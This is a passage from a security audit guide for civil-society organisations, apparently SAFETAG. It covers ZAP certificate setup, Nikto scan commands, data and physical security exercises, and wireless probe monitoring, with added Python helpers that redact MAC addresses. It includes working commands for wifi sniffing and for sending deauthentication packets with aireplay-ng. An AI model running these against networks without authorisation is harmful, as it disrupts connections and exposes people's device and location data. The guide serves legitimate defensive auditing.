  2. On the Content tab, in the Certificates section, click Certificates.
  3. On the Trusted Root Certificates tab, verify that the OWASP ZAP Root CA certificate is listed.

If you are testing using Firefox, you need to install the ZAP Root CA certificate a second time into Firefox’s own certificate store.

To install the ZAP Root CA for Mozilla Firefox:

  1. Start Firefox and click Preferences.
  2. On the Advanced tab, click the Encryption tab.
  3. Click View Certificates.
  4. On the Trusted root certificates tab, click Import and select the ZAP Root CA file you saved previously.
  5. In the Import wizard, select Trust this CA to identify web sites.
  6. Click OK.

Additional OWASP ZAP references:


Nikto Web Scanner (Active)

Introduction

Nikto is a tool that comes with Kali Linux. It is an easy tool to use for performing web vulnerability scans. According to Nikto's main page:

"Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated"

In Kali Linux you can open Nikto in either of these ways:

  1. Go to Applications > Web Application Analysis > Web Vulnerability Scanners > Nikto

  2. Go to Applications > System > Root Terminal

Using Nikto to Scan Web Application

Nikto Command: nikto -Display V -h http://targetdomain.com
    Execute a simple scan. -Display controls what is shown while Nikto runs; V selects verbose output.

Nikto Command: nikto -Display V -o scan_result.html -Format html -h http://targetdomain.com
    Save Nikto's output to the file scan_result.html. You can specify the format of the output file using the -Format option (csv, html, msf, xml, txt).

Nikto Command: nikto -useproxy -h http://targetdomain.com
    Scan via a proxy. Edit Nikto's configuration file in /etc/nikto.config.txt, setting the values of PROXYHOST=XXX.XXX.XXX.XXX and PROXYPORT=XXXX to the corresponding values of your proxy.

Nikto Command: nikto -Tuning N -h http://targetdomain.com
    Tuning options control the tests that Nikto will run against a target. Replace N with one or more of the option codes below. The given string is parsed from left to right; an x character reverses the selection for all characters to the right of it (i.e., run everything except those tests).
    0  File Upload
    1  Interesting File / Seen in logs
    2  Misconfiguration / Default File
    3  Information Disclosure
    4  Injection (XSS/Script/HTML)
    5  Remote File Retrieval - Inside Web Root
    6  Denial of Service
    7  Remote File Retrieval - Server Wide
    8  Command Execution / Remote Shell
    9  SQL Injection
    a  Authentication Bypass
    b  Software Identification
    c  Remote Source Inclusion
    x  Reverse Tuning Options (i.e., include all except specified)
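Nikto's raw output repeats the same issue once per path it was found at, which makes the scan result hard to turn into the documented findings the Vulnerability Research step asks for. The following is an added example written for this guide (not part of Nikto) that reads a report saved with -Format csv, groups findings that share a reference id so each issue appears once with all affected paths, and keeps the un-referenced informational lines separate so the auditor can see what still needs validation. The sample lines are constructed, and the column layout they use (host, ip, port, reference id, HTTP method, URI, description) is my assumption about Nikto's CSV format; check it against a real report before relying on the parser.

```python
"""Group a Nikto CSV report into one entry per issue.

Added example for this guide, not Nikto code. Assumed CSV columns:
host, ip, port, reference id (empty when none), method, uri, description.
"""
import csv
import io
from collections import OrderedDict

FIELDS = ["host", "ip", "port", "reference", "method", "uri", "description"]

# Constructed sample report (not from a real scan); reference ids are the
# style Nikto prints, here used only as sample values
SAMPLE_CSV = """\
"www.example.test","192.0.2.10","80","","GET","/","Server: Apache/2.4.7 (Ubuntu)"
"www.example.test","192.0.2.10","80","","GET","/","The anti-clickjacking X-Frame-Options header is not present."
"www.example.test","192.0.2.10","80","OSVDB-3268","GET","/icons/","Directory indexing found."
"www.example.test","192.0.2.10","80","OSVDB-3268","GET","/images/","Directory indexing found."
"www.example.test","192.0.2.10","80","OSVDB-3092","GET","/admin/","This might be interesting."
"""


def parse_nikto_csv(text):
    """Return one dict per well-formed row; blank or short rows are skipped."""
    rows = []
    for rec in csv.reader(io.StringIO(text)):
        if len(rec) != len(FIELDS):
            continue
        rows.append(dict(zip(FIELDS, rec)))
    return rows


def summarise_findings(findings):
    """Collapse repeated findings: one entry per reference id with every
    affected URI, plus the informational lines that carry no reference."""
    by_ref = OrderedDict()
    informational = []
    hosts = set()
    for f in findings:
        hosts.add(f"{f['host']}:{f['port']}")
        if not f["reference"]:
            informational.append(f["description"])
            continue
        entry = by_ref.setdefault(f["reference"], {"description": f["description"], "uris": []})
        if f["uri"] not in entry["uris"]:
            entry["uris"].append(f["uri"])
    return {"hosts": sorted(hosts), "by_reference": by_ref, "informational": informational}


def print_summary(summary):
    print("Hosts scanned:", ", ".join(summary["hosts"]))
    print("\nReferenced findings (document each once, list all paths):")
    for ref, entry in summary["by_reference"].items():
        print(f"  {ref}: {entry['description']}")
        for uri in entry["uris"]:
            print(f"      at {uri}")
    print("\nInformational (needs validation before reporting as a vulnerability):")
    for line in summary["informational"]:
        print(f"  - {line}")


if __name__ == "__main__":
    print_summary(summarise_findings(parse_nikto_csv(SAMPLE_CSV)))
```

Replace SAMPLE_CSV with the contents of the file written by `-o scan_result.csv -Format csv`; the "informational" list is where version banners and missing headers land, which usually become recommendations rather than findings in the report.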

Recommendation

Check Config Files

Summary

Examine configuration files for vulnerabilities using "hardening", or "common mistake" guides found online.

Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Network Vulnerabilities

See the Network Access and Mapping activities for methods to expose insecure wireless networks and for methods to use network mapping and traffic analysis to discover further potential vulnerabilities or points to investigate.

Router Based Attacks

Summary

Many wireless routers still use the default password listed in “Router Default Password Search”, meaning that anyone with access to the network could also take complete control of the router - adding in remote access tools or setting up other attacks.

Overview
Materials Needed
Considerations
Walkthrough
Material that may be Useful:
Recommendation

Change Default Router Passwords

Passwords - particularly on core network devices - are very important. Use a password manager to save the new password (or be prepared to reset the router to factory defaults).

While nominally "inside the firewall" and protected from remote attacks, leaving routers with default passwords, particularly wireless routers whose networks are often shared with visitors, is a potentially very high risk for an organization. Anyone who has gained access to the network via legitimate or other means could subtly alter the router's configuration to provide remote access, or route traffic to an attacker-designated server. Such changes can easily go undetected for long periods of time.

A common fear is forgetting the new router password. A password management system is the obvious solution, but if the router is in a secure location, even a sticky note would be better than the default password.

Data Assessment

Summary

This component allows the auditor to identify what sensitive data exists for the organization, where it is stored, and how it is transferred.

Purpose

Sensitive files are often stored across multiple devices with different levels of security. A data assessment allows the auditor to recommend secure storage solutions which best meet the organization's risk assessment and workflow needs. While the auditor has insight on some of this based on the Network Access and Network Mapping work, cross-staff understanding and agreement on what constitutes sensitive data will support later organizational change.

An adversary who obtains a laptop, workstation, or backup drive will be able to read or modify sensitive information on the device, even if that staff member has set a strong account password. This applies to threats involving loss, theft, and confiscation, but also to "checkpoint" scenarios in which they may only have access for a few minutes. Furthermore, in the event of a burglary or office raid, an adversary could obtain all sensitive information on the organization's devices, possibly even undetected.

The Flow Of Information

Data Assessment Information Flow

Guiding Questions

Approaches

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Outputs

Operational Security

Preparation

Resources

Activities

Sensitive Data

Summary

Data and meta-data about an organization and its staff are incredibly difficult to keep track of over time, as people or projects use cloud services like Dropbox or Google Drive for some activities, a shared server for others, and a mix of work and personal devices (laptops, phones, tablets...).

This is natural, but it is important to keep track of where your organization's data lives and who can access it.

Overview
Materials Needed
Considerations
Walkthrough

Sensitive Data Assessment Activity

Duration: 45 minutes

This exercise is adapted from the LevelUp activity Backup Matrix, part of the curricula for Data Retention and Backup by Daniel O'Clunaigh, Ali Ravi, Samir Nassar, and Carol.

Materials to Prepare:
Relative Sensitivity | Computer | USB / External Drive | Cloud Storage | Phones, Print, etc.
High                 |          |                      |               |
Moderate             |          |                      |               |
Low                  |          |                      |               |

Explain to participants that we're going to conduct an information mapping activity to get a sense of where our important information actually is.

Start by listing the different places where our information is stored, according to participants. If no suggestions are forthcoming, we can prompt participants with the obvious stuff:

Use large stickies to place these as column headers on a wall. More will come up later in the course of the exercise.

Elicit from participants what type of information or data they have in each of these places. For example:

To encourage participant interaction, write one example on a sticky and place it in the appropriate box in the matrix. Then, ask whether there is another copy of this data somewhere. If there is, you can use another sticky and put it wherever they keep the duplicate.

TIP: Place Computers, Phones, and Email next to each other, so you won't have to create duplicates for everything "stored" in email (and therefore on laptops and phones)

Introduce a new vertical axis representing sensitivity. The higher on the chart, the more sensitive the data. Ask the participants to rank data.

For a large group, divide the group into smaller teams for the next steps (it helps if there are relatively clear thematic distinctions within the group, such as nationality, type of work, area of interest, etc.)

Provide stickies to the group(s). Have the group(s) brainstorm about all of the data they work with, focusing on the most important data first.

Participants should write ONE type per sticky, and create duplicates if the data is stored in multiple locations.

For a small group, this can be done as a "live" brainstorm. For larger groups that have been subdivided, have each group finish listing out their most important data and then have each group place the stickies on the matrix. Invite discussions around the sensitivity of the data.

An example may look something like this:

Level Up Backup Matrix Example

Explain that this gives us an idea of where our data is. Elicit whether or not this is all the data we generate. Of course it isn't: it's only a small percentage.

The LevelUp lesson uses this primarily to discuss the importance of backups, and this is a valuable point to make.

Call out the information that they are keeping on their computer's hard drive (which will usually be the fullest one). Elicit some of the things that can cause a computer to stop working. Maybe take a show of hands: Who has had this happen to them?

For SAFETAG, we focus on the "Sensitive data in the wrong hands" section. Based on the clustering of sensitive data along the vertical axis, choose a column that has an unusual amount of sensitive data (email or computers, usually).

Remove the stickies from the column but keep them in your hand and read them. Now I have this information. What can I do with it? And what are you left with? Is anyone at risk - yourselves? partners? If this were published on the Internet, what would happen?

Recommendation

Risks of Data Lost and Found

Summary

Have staff rank the impact if different data within the organization was lost, and the impact if various adversaries gained access to that data.

Overview
Materials Needed
Considerations
Walkthrough

See the Sensitive Data activity for an interactive way to gather the types of data in the organization for this ranking exercise.

Recommendation

Private Data

Summary

Guide staff through an activity to have them list private data within the organization (e.g. using the "Personal Information To Keep Private" handout).

Overview
Materials Needed
Considerations
Walkthrough

Personal Information To Keep Private

Information that can be used to identify individuals, organizations, and even communities of practice should be treated with the utmost care. Some data, like names, phone numbers, and addresses, are obvious, while others, like computer names, the MAC addresses of wifi cards, or pseudonymous social media accounts, may be less obvious. Also, combinations of information - location, date, and type of activity, or even an issue area of interest and a city name - may specify a very small number of activists or organizations.

This spreadsheet, part of the Responsible Data Forum documentation sprint, provides a useful baseline of types of data and ways to manage or obfuscate it usefully: Data Anonymization Checklist

Recommendation

For the internal audit report back to the organization, much of the information will require specific identification of user devices (and by extension, their users), as well as very sensitive organizational data. None of this data, by intention, accident, or adversarial action, should be shared with third parties.

Please refer to the Analysis and Reporting section for the limited data set that is required for project reporting, and to the Operational Security section for guidance on data security.

Assessing Usage of Cloud Services

Summary

During the organizational assessment you will almost certainly come across 3rd party cloud-based service providers being used by the audited organization. The organization may be interested in your assessment of the security of those services. This poses several challenges to you as an auditor:

* auditing 3rd party web applications almost certainly falls outside of the scope of the audit engagement
* you likely do not have an agreement with the service provider to scan their application
* a proper assessment would take more time than is available for the organizational audit
* you may not be familiar with the service or technology it is built on

Despite these challenges, significant organizational processes and sensitive data may reside on or rely upon those 3rd party applications. It can be important to the audit to provide some preliminary investigation and risk assessment into the usage of any 3rd party cloud services they rely upon.

Overview
Materials Needed
Considerations
Walkthrough

It is increasingly difficult to run complex organizations without some reliance on cloud-based service providers for email hosting, web hosting, or document management/backup. Organizations (assisted by the auditor) should review their options in the selection of cloud providers, and in parallel consider ways to apply practices and policies to their use to meet organizational security requirements.

Cloud Service Provider Review
Internal/Organizational Considerations
Recommendation

Schedule regular (annual?) reviews of the external services to ensure that they meet organizational requirements for functionality and security, business solvency, and exporting or transferring of data.

When considering formalizing the use of new 3rd party services, review the questions and processes here to help guide the decision.

Physical and Operational Security

Summary

The organizational security methodology is focused on how to mitigate against threats that occur because of the arrangement of digital assets in the physical world -- how secure are the devices at an organization's office, where and how staff travel with organizational devices, and whether staff work outside of the office (e.g. in remote offices, at their homes, while traveling, or at cafes). Further, is organizational information accessed from personal devices, and how are those devices secured?

Purpose

While the SAFETAG framework is focused on the security of data, the physicality of devices, backup drives, servers, and even hard-wired networks cannot be overlooked.

For many organizations, digital threats that depend on physical access are considered the least probable. So much so, that many security specialists concede that there is no proper defense against an attacker with physical access to sensitive hardware. While there is some truth to this, it is not useful advice for small scale civil society organizations or independent media houses. The risks that advocacy and media organizations face are far more varied, and the cost of lost information can be crippling to their ability to operate.

Depending on the specific threats for each organization, the auditor should consider not only the one-time exfiltration of data but also the potential ways an adversary could use physical access or proximity to the organization or its devices to gain ongoing remote access, track the organization, or cause harm through the outright destruction of data.

The Flow Of Information

Data Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Activities

Guided Tour

Summary

During this component an auditor tours the audit location(s) and flags potential risks related to physical access at that location.

Overview

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can be moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Materials Needed
Considerations
Walkthrough

As part of your first day, have your point of contact walk you around the office - this is primarily a chance to understand the office layout and meet the rest of the staff, but take mental note of the devices in use and lying out on desks as you walk around the office. Note as well the location of and access to components such as servers and networking equipment. Taking actual notes may make the staff feel that you are judging them, especially if this is your first interaction -- refrain from this, and if needed, consider a more "neutral" note-taking process by integrating the Office Mapping activity.

If the auditor is unable to go to the office (or can only visit one of multiple offices), consider having the point of contact use a video call. You will want the entire staff to be aware of this activity and to know the person who is walking around the office. This requires sufficient (and unmetered or low-cost) bandwidth for a 1-hour video call. It could be scheduled for before or after office hours, both to discover how devices are left overnight and to reduce the impact on the network.

Similarly, the in-person tour can also be done outside of normal business hours. Please note: this can damage the trust the staff has in the auditor, as well as unintentionally embarrassing specific staff members in the eyes of the point of contact. It is not recommended to do this except for organizations who have already received training and worked on improving their physical/operational security practices and face an active adversary. This could be before the staff arrives in the morning, during lunch, or after hours (perhaps have dinner with your point of contact, and come back to check the organization afterwards). This gives a clearer picture of how devices are secured outside of the work day (are desktops and laptops unsecured, still on, logged in?). Are backup drives or other storage media easily accessible? Are doors to server rooms/closets locked? Are keys to these locked cabinets/rooms visible?

Materials that may be useful
Recommendation

Office Equipment is unsecured against burglary

Unsecured physical network components and devices such as computers, servers, and external drives present a risk of sensitive data loss through theft, seizure, and malicious interference. Access to network components and servers should be limited and devices should be secured when not in use.

In the event of a burglary or office raid, an attacker could easily obtain sensitive information from devices without encryption, external hard drives, and other easily accessible items. An advanced attacker could compromise the network for later surveillance.

Secure Devices

Lock in desks or via security cables all easily portable items

Any device which connects to the organization's digital assets (and therefore has passwords or cached data) or stores organizational data (including backup drives, laptops, desktops, cameras, other storage media), should be secured (ideally out of sight, such as in a locked cabinet or desk drawer) when not in use to prevent theft and discourage seizure.

Follow the Device Assessment guidelines on drive encryption.

Encrypted drives offer the best protection against data loss from stolen or seized devices. Follow the recommendations of the Device Assessment section, paying specific attention to the need for strong passwords, automatic locking of logged-in accounts, and the importance of turning a machine off to fully benefit from drive encryption.

Place core network components and servers in a locked space.

Direct access to servers and network components such as routers, cable modems, patch panels and switches provides an adversary multiple ways to extract sensitive information and cause extensive, yet hard to detect, damage. Ensuring not only that these are physically protected, but that there are organizational policies around which staff have access to them, is critical - a locked cabinet that always has the key in the lock does not provide security. If a particular component needs, for example, regular rebooting, creative solutions should be found to balance security and staff needs.

De-activate unused network ports

Hard-wired network ports tend to connect directly into the most trusted parts of a network. De-activating any that are in public areas of the office (front desk, conference rooms, break rooms), as well as any that are not needed is recommended.

Operational Security Survey

Summary

This activity helps the auditor assess the organization's current operational security policies and practices through in-person or remote surveys and/or interviews. By also requesting to review any official policies, and by conducting multiple iterations of this with different staff members, some basic verification of the practices and of staff awareness/understanding of existing policies can be achieved.

Overview

The auditor interviews and/or requests survey input from organizational representatives, requests supporting documentation (e.g. policies) as relevant, and iterates/repeats as needed.

This activity is used to solidify the auditor's understanding of the physical risks the organization faces in its work as they impact information security:

This can be done entirely remotely over secure communications channels (see operational security considerations), and may be useful to be done partially or fully in advance of an in-person audit to further understand operational risks of traveling to the office location.

Materials Needed
Considerations
Walkthrough

This activity should build on the preparation work of the auditor, as well as the capacity assessment and context research work:

Once an initial interview or survey has taken place (as part of the capacity assessment or dedicated to the above-mentioned questions), send a follow-up request for any policies mentioned or referred to (travel policies, onboarding/offboarding policies for staff changes, personal device usage ("BYOD") policies, etc.). After reviewing those documents, request any additional policies those may refer to (general IT or security policies), and/or schedule a follow-up interview or informal survey to dig deeper into remaining unanswered questions on the operational security situation of the organization as well as their adaptations to it. In the (likely) case where there are no policies governing these topics, the auditor can ask their points of contact for these discussions what the general practices are and expand and verify this through additional activities.

In creating new questions, be careful not to "lead" on security in a way that would discourage honest and transparent responses. For example, ask "Do you host community events and trainings?" instead of "Do you allow outside people into your office?"

Below are questions not already covered in the capacity assessment interview process, and after that selected questions from that process which are of particular use here.

Office layout and proximity concerns

Describe your office - is it part of a floor of a building? An entire floor? (What level of the building?) How close are other buildings? Is it a shared, open office space or co-working space (shared network? open access?)?

Has the organization dealt with robberies/theft, break-ins, or office raids? If so, what happened, when, and how did you respond (or do you have a policy or contingency plan? When was that last reviewed/updated?)

What other wifi networks can you see? (See https://wigle.net/ )

Physical Access Controls

Do you consider your office space to be secure?

Who has independent access to the office space, and routine after-hours access (i.e. who is able to unlock the space)? This may include security, cleaning or other building service personnel.

Do you have policies and procedures for authorizing and limiting unauthorized physical access to digital systems and the facilities in which they are housed?

Describe the measures to restrict physical access to the following

Do your policies and procedures specify the methods used to control physical access to your secure areas, such as door locks, access control systems, security officers, or video monitoring?

Device Controls

Do you have procedures for physically securing portable devices such as laptops and mobile phones?

Do you have key personnel responsible for the security of digital resources?

Do you have policies covering laptop security (e.g. cable lock or secure storage)?

Are there procedures to automatically lock digital devices if left unattended for some time?

Emergency Planning

Do you have a business continuity plan in case of serious incidents or disaster to your digital resources and is it current?

Does your plan identify areas and facilities that need to be sealed off immediately in case of an emergency?

Are key personnel aware of the plan and how to respond to the emergency?

Programs and staff

Selected questions from the Capacity Assessment Interview, "Open Up" section:

From "Threat Information"

From the Technical Only section:

Recommendation

See recommendation section in the Guided Tour activity.

For useful organizational policy recommendations, review the SANS Information Security Policy Templates

Office Mapping

Summary

This activity seeks to identify potential physical vulnerabilities to an organization's information security practices by documenting the current physical layout of the office and the locations of key assets, as well as potential "external" risks such as nearby/shared office spaces.

This can be done in person independently or alongside the "Guided Tour" activity, and can also be done in advance of an assessment or remotely by a willing staff member who knows where these assets are located (often a technical or administrative staff person). This can also be conducted in a multi-office or home-office environment where the auditor is unable to visit every location.

Overview

In this activity, the auditor or the organization draws a map of the office space and notes locations of potentially valuable information or assets.

This activity can be paired with the Guided Tour activity, to reduce the awkwardness of taking notes while walking around the office during the Tour, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each. This can also be done by an organizational point of contact in advance to provide additional preparation for the auditor.

Materials Needed
Considerations
Walkthrough

Walk around the office and draw a map of the floor-plan (do not rely upon memory). Consider taking photos of specific areas (e.g. confusing layouts or areas difficult to capture in drawing). Make notes of where intruders could gain access to the office, where sensitive data may live (in the executive director's desk, in a storage closet, on devices), and relevant other items. Also note the overall privacy that the office provides (is it a shared office space, shared building, etc.)

Note the locations of any of the following that apply:

If doing this activity remotely and/or in advance of an audit, it may be useful to have multiple staff members independently draw maps and to provide the organization with additional guiding questions:

Recommendation

See recommendation section in the Guided Tour activity.

Scavenger Hunt

Summary

This activity assists in identifying potential physical security concerns at an organization, particularly when an auditor cannot travel to the office location or cannot visit every office location. The scavenger hunt approach is focused on involving the organization's staff members in mapping out potential threats, based on the abstraction and gamification of the physical security mapping process. See the "Risk Hunting" exercise in SaferJourno, page 19, for additional ideas and guidance on conducting this activity.

Overview

A local facilitator is required to lead this "scavenger hunt" where staff members seek out potential physical security challenges themselves. This activity should only be conducted within an environment with a high level of trust and consent. The auditor should get the agreement of the host NGO to involve all staff members in the exercise to avoid causing trust issues. By involving the staff members in identifying physical security risks, you are also taking a step forward in increasing awareness of these issues.

With facilitation, staff members will explore their own office looking for potential physical security risks and share results. To reduce the risk of individual staff embarrassment, they will first review their own working space and secure it before looking around other parts of the office. The facilitator, in consultation with the auditor and the organizational point of contact, may declare some areas "off limits".

Materials Needed
Considerations
Walkthrough

The auditor should first meet with the facilitator (possibly over secure videochat) to brief them on the activity and map out potential challenges (particularly around trust, organizational hierarchies, and any potential repercussions).

The auditor then prepares a checklist of physical vulnerabilities with the facilitator, based on the current understanding of the organization's assets and the context they are operating within. The auditor, facilitator, and organization point of contact should decide if any areas are "off limits." Note that this is only a list of suggestions; as with the "Risk Hunting" exercise in SaferJourno, it should be modified to fit the requirements, assets, and threats the organization faces:

At the organization, the facilitator explains the activity to the organization members. To balance the need for consent with the benefits of identifying actual daily practices which may need improvement, the staff should already be aware that examining physical devices is part of the audit scope, but not the specific activity. Staff will be able to first identify and address their personal concerns before others.

Recommendation

(See "Guided Tour")

Monitor Open Wireless Traffic

Summary

It can be valuable to listen to broadcast wireless traffic at the physical office location, even before knowing anything about the organization's network itself. This outside, passive information gathering can reveal a surprising amount of data on not only what devices are connecting to which networks, but also what type of devices they are (based on their unique MAC addresses), and what other networks those devices have historically connected to. These probes can reveal personal, organizational, locational, and device information that, taken in context, can be dangerous or lead to other vulnerabilities.

Overview

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

Materials Needed
Considerations
Walkthrough
Step 1: Monitor Mode

You should disconnect from any wifi network you may be connected to in order to capture the widest amount of data.

Switch your wireless adapter to monitor mode:

$ airmon-ng start <interface>

You may need to stop your network manager to prevent it from interfering. Run

$ airmon-ng check

to list anything that is causing problems, and

$ airmon-ng check kill

to try to stop those processes automatically; running stop network-manager && stop avahi-daemon may keep them from restarting automatically.

Step 2: Listen for wifi probes.

Run airodump-ng on the monitor mode interface (usually mon0). This listens to wifi beacons and you can begin analyzing who is on what network, and see historical networks.

airodump-ng -w filename mon0

This scans all networks and channels, collecting broadcast network information. Note that, despite its broadcast nature, this is privacy invasive and can be considered illegal: http://www.slate.com/blogs/future_tense/2013/09/16/google_street_view_wi_fi_snooping_case_good_news_and_bad_news.html . You can restrict this to a specific channel or base station ID (BSSID) with -c and --bssid:

airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w filename mon0

Step 3: de-auth (optional)

Send de-authentication packets to force clients to reconnect and send out additional probes. Take note that by its very nature, de-authentication causes annoying interruptions to wifi traffic. This breaks connections, drops skype calls, and can make the wireless network temporarily unusable -- Make sure to check with staff before going through this (to make sure no one is doing a live webcast or on an important VOIP call, and to expect some network instability).

$ aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

 15:54:48  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AA:BB:CC:DD:EE:FF] [ 5| 3 ACKs]

This command de-authenticates one targeted user with one attempted deauth packet. "-0 10" would try 10 times (potentially disconnecting the user multiple times!). With permission, you can also target all users on a network by leaving out the "-c ..." flag.

There are scripts, like wifijammer, which use this same approach to jam all wifi connections in range of the attacking computer, so check against the documentation at http://www.aircrack-ng.org and act responsibly to protect yourself and the organization.

Step 4: MAC Address Research

The first three octets (the first six hex digits) of each MAC address designate the vendor, which can reveal useful information in matching MAC addresses to devices. The full MAC address is a unique identifier, so never post or search using the full address. Note that, increasingly, devices use MAC address randomization, but where it is implemented it is often implemented poorly against even minimally determined adversaries, as per this 2017 research study.

To compare found MAC addresses to the vendor database offline, you can download the full vendor database from IEEE or use the Wireshark list.

Step 5: Ongoing Monitoring

The longer you leave this running (particularly when staff are first entering the office or returning after lunch/meetings), the better a sense you will get of what devices are connected to the network.

Watch what probes the various devices are sending out (especially when they are deauthenticated, as above). You will see each computer on the network, as identified by its MAC address, broadcast information about previous networks to which it has connected.

BSSID              STATION            PWR   Rate    Lost    Frames Probe

00:11:22:33:44:55   0F:3E:DF:DA:2D:E2   -67 0   0   234567  SampleOrg,linksys,John Smith's iPhone,Free Public Wifi
00:11:22:33:44:55   F8:7E:FC:03:CC:43   -80 -24 0   234567  amygreen,SampleOrg,android-hotspot,Starbucks,united_club,Dulles Airport WiFi
00:11:22:33:44:55   F8:19:F3:DF:75:19   -58 -54 0   234567  SampleOrg
00:11:22:33:44:55   38:08:95:EB:7E:0B   -75 -12 0   234567  HolidayInn,SampleOrg,John Smith's Mac mini,android-hotspot
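Reading a station table like the one above by hand gets tedious once dozens of devices are probing. The script below is an added example (not SAFETAG's own tooling, and not part of aircrack-ng) that parses the sample rows shown above and turns them into the kind of exposure summary an auditor would discuss with staff: it identifies the SSID shared by the most stations (the likely office network), flags probe names that leak a person's name, a travel location or a phone hotspot, notes whether a station address is locally administered (the bit that randomized MAC addresses set), and prints only the vendor prefix of each address so the report itself does not record full MAC addresses. The vendor table and the probe-name keywords are constructed stand-ins: replace OUI_TABLE with the IEEE or Wireshark list for real use.

```python
"""Summarise what an airodump-ng station table reveals, from a defender's view.

Added example for the SAFETAG guide; not the project's own code. OUI_TABLE and
LOCATION_WORDS are constructed assumptions for illustration, not verified data.
"""
import re
from collections import Counter

# Constructed stand-in for the IEEE OUI list (prefix -> vendor). The two entries
# are made up for this example; load the real list for actual assessments.
OUI_TABLE = {
    "F8:7E:FC": "ExampleVendor-A",
    "38:08:95": "ExampleVendor-B",
}

# Constructed keyword list for spotting travel/hospitality network names.
LOCATION_WORDS = ("airport", "hotel", "inn", "club", "starbucks", "cafe", "public")

# The sample station rows from the page (BSSID, STATION, PWR, Rate, Lost, Frames, Probe).
SAMPLE_ROWS = """\
00:11:22:33:44:55   0F:3E:DF:DA:2D:E2   -67 0   0   234567  SampleOrg,linksys,John Smith's iPhone,Free Public Wifi
00:11:22:33:44:55   F8:7E:FC:03:CC:43   -80 -24 0   234567  amygreen,SampleOrg,android-hotspot,Starbucks,united_club,Dulles Airport WiFi
00:11:22:33:44:55   F8:19:F3:DF:75:19   -58 -54 0   234567  SampleOrg
00:11:22:33:44:55   38:08:95:EB:7E:0B   -75 -12 0   234567  HolidayInn,SampleOrg,John Smith's Mac mini,android-hotspot
"""

ROW_RE = re.compile(
    r"^([0-9A-Fa-f:]{17})\s+([0-9A-Fa-f:]{17})\s+(-?\d+)\s+(-?\d+)\s+(\d+)\s+(\d+)\s*(.*)$"
)


def parse_station_rows(text):
    """Parse the station section of airodump-ng output into dicts; skips header/blank lines."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        bssid, station, pwr, _rate, _lost, _frames, probe = m.groups()
        probes = [p.strip() for p in probe.split(",") if p.strip()]
        rows.append({"bssid": bssid.upper(), "station": station.upper(),
                     "power": int(pwr), "probes": probes})
    return rows


def oui(mac):
    """Vendor prefix: the first three octets of the address."""
    return mac.upper()[:8]


def is_locally_administered(mac):
    """Bit 0x02 of the first octet marks a locally administered (often randomized) address."""
    return bool(int(mac[:2], 16) & 0x02)


def vendor_for(mac):
    if is_locally_administered(mac):
        return "locally administered / randomized"
    return OUI_TABLE.get(oui(mac), "unknown (check the IEEE OUI list)")


def redact_mac(mac):
    """Keep only the vendor prefix so the report never stores a full identifier."""
    return oui(mac) + ":xx:xx:xx"


def classify_probe(ssid):
    """Tag a probed network name by the kind of information it leaks."""
    tags = set()
    if "'s" in ssid or "\u2019s" in ssid:
        tags.add("personal")          # e.g. "John Smith's iPhone"
    low = ssid.lower()
    if any(word in low for word in LOCATION_WORDS):
        tags.add("location")          # airports, hotels, cafes: travel history
    if "hotspot" in low:
        tags.add("hotspot")           # phone tethering, often tied to a person
    return tags


def likely_office_ssid(rows):
    """The SSID probed by the most distinct stations is usually the office network."""
    counts = Counter(s for r in rows for s in set(r["probes"]))
    return counts.most_common(1)[0][0] if counts else None


def probe_exposure_report(rows):
    """One redacted summary entry per station, listing only the revealing probes."""
    report = []
    for r in rows:
        flagged = {}
        for ssid in r["probes"]:
            tags = classify_probe(ssid)
            if tags:
                flagged[ssid] = sorted(tags)
        report.append({
            "station": redact_mac(r["station"]),
            "vendor": vendor_for(r["station"]),
            "randomized": is_locally_administered(r["station"]),
            "probe_count": len(r["probes"]),
            "flagged": flagged,
        })
    return report


if __name__ == "__main__":
    rows = parse_station_rows(SAMPLE_ROWS)
    print("likely office SSID:", likely_office_ssid(rows))
    for entry in probe_exposure_report(rows):
        print(entry)
```

The report is deliberately coarse: the point in a SAFETAG conversation is to show staff that a device announces "John Smith's iPhone" and "Dulles Airport WiFi" to anyone nearby, not to build a profile of any one person, which is why the script discards the device-specific half of every address before it writes anything down.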
Recommendation
Recommendation: Cleanse wifi network connection history

For most devices, deleting networks from the “saved” network list will stop them from being probed. Obviously, this can be an annoyance for networks you regularly connect to, so renaming these networks to non-revealing names would help, as would creating non-name-associated “guest” networks for colleagues connecting to your home network.

On iPhones and iPads, it is not possible to selectively remove historical networks unless you are currently in range of that network. It is however possible to remove all history: go to Settings > General > Reset > Reset Network Settings. When you take this step, it is worth going through this reset multiple times, approximately once per year of device ownership, as the first reset appears to only remove recently-connected networks, and older networks will still be broadcast.

Recommendation: Use innocuous network names

